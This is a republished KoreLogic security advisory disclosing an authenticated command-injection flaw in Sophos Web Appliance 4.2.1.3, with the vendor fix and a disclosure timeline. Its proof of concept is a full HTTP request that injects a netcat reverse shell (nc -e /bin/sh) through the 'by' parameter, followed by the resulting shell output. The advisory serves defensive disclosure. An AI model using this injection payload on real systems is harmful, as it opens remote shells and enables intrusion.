Sophos Web Appliance 4.2.1.3 – Remote Code Execution

• Exploit Database
• 12 阅读

• 作者： KoreLogic
  日期： 2016-11-07
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/40725/

• KL-001-2016-009 : Sophos Web Appliance Remote Code Execution
  
  Title: Sophos Web Appliance Remote Code Execution
  Advisory ID: KL-001-2016-009
  Publication Date: 2016.11.03
  Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2016-009.txt
  
  
  1. Vulnerability Details
  
   Affected Vendor: Sophos
   Affected Product: Web Apppliance
   Affected Version: v4.2.1.3
   Platform: Embedded Linux
   CWE Classification: CWE-78: Improper Neutralization of Special Elements
   used in an OS Command ('OS Command Injection'),
   CWE-88: Argument Injection or Modification
   Impact: Remote Code Execution
   Attack vector: HTTP
  
  2. Vulnerability Description
  
   An authenticated user of any privilege can execute arbitrary
   system commands as the non-root webserver user.
  
  3. Technical Description
  
   Multiple parameters to the web interface are unsafely handled and
   can be used to run operating system commands, such as:
  
   POST /index.php?c=logs HTTP/1.1
   Host: [redacted]
   User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:46.0)
  Gecko/20100101 Firefox/46.0
   Accept: text/javascript, text/html, application/xml, text/xml, */*
   Accept-Language: en-US,en;q=0.5
   Accept-Encoding: gzip, deflate, br
   DNT: 1
   X-Requested-With: XMLHttpRequest
   X-Prototype-Version: 1.6.1
   Content-Type: application/x-www-form-urlencoded; charset=UTF-8
   Content-Length: 305
   Connection: close
  
  
  STYLE=590fca17b230e8cdba0394cfa28ef2eb&period=today&xperiod=&sb_xperiod=xdays&startDate=&txt_time_start=12%3A00%20AM&endDate=&txt_time_end=11%3A59%20PM&txt_filter_user_timeline=test&action=search&by=user_timeline`nc%20-e%20/bin/sh%20[redacted]%209191`&search=test&sort=time&multiplier=1&start=&end=&direction=1
  
   HTTP/1.1 200 OK
   Date: Tue, 10 May 2016 15:35:05 GMT
   Server: Apache
   Cache-Control: no-store, no-cache, must-revalidate, private, post-check=0,
  pre-check=0
   Pragma: no-cache
   X-Frame-Options: sameorigin
   X-Content-Type-Options: nosniff
   Connection: close
   Content-Type: text/html; charset=utf-8
   Content-Length: 207
  
   {"lastPage":1,"startTime":"2016\/05\/10 12:00 AM","endTime":"2016\/05\/10
  4:35
  PM","filter":"test","recordsDisplayed":0,"recordsTotal":0,"data":[],"startDateBeforeData":false,"earliestRecord":"1970\/01\/01"}
  
   --
  
   The vulnerable parameters are: by, request_id, and txt_filter_domain
  
   That request launches the following process on the SWA:
  
   1000 168510.00.0 27281040 ?S15:43 0:00 sh -c
  /opt/perl/bin/salp-generate-report.pl --report=Filter --res=-
  --type=user_timeline`nc -e /bin/sh [redacted] 9191` --filter='dGVzdA=='
  --start='2016/05/10' --end='2016/05/10' --action=''
  --sid=590fca17b230e8cdba0394cfa28ef2eb
  
   From the shell launched via netcat:
  
   id;uname -a;uptime
   uid=1000(spiderman) gid=1000(spiderman)
  groups=1000(spiderman),16(cron),44(tproxyd),45(wdx)
   Linux please 3.2.57 #1 SMP Fri Feb 19 18:30:36 UTC 2016 i686 GNU/Linux
   15:52:34 up4:26,0 users,load average: 0.11, 0.12, 0.15
  
  4. Mitigation and Remediation Recommendation
  
   The vendor has issued a fix for this vulnerability in Version
   4.3 of SWA. Release notes available at:
  
   http://swa.sophos.com/rn/swa/concepts/ReleaseNotes_4.3.html
  
  5. Credit
  
   This vulnerability was discovered by Matt Bergin (@thatguylevel)
   of KoreLogic, Inc.
  
  6. Disclosure Timeline
  
   2016.09.09 - KoreLogic sends vulnerability report and PoC to Sophos
   2016.09.14 - Sophos requests KoreLogic re-send vulnerability details.
   2016.09.28 - KoreLogic requests status update.
   2016.09.28 - Sophos informs KoreLogic that an update including a fix
  for this vulnerability will be available near the end
  of October.
   2016.10.13 - Sophos informs KoreLogic that the update was released to a
  limited customer base and is expected to be distributed
  at-large over the following week.
   2016.11.03 - Public disclosure.
  
  7. Proof of Concept
  
   See 3. Technical Description.
  
  
  The contents of this advisory are copyright(c) 2016
  KoreLogic, Inc. and are licensed under a Creative Commons
  Attribution Share-Alike 4.0 (United States) License:
  http://creativecommons.org/licenses/by-sa/4.0/
  
  KoreLogic, Inc. is a founder-owned and operated company with a
  proven track record of providing security services to entities
  ranging from Fortune 500 to small and mid-sized companies. We
  are a highly skilled team of senior security consultants doing
  by-hand security assessments for the most important networks in
  the U.S. and around the world. We are also developers of various
  tools and resources aimed at helping the security community.
  https://www.korelogic.com/about-korelogic.html
  
  Our public vulnerability disclosure policy is available at:
  https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt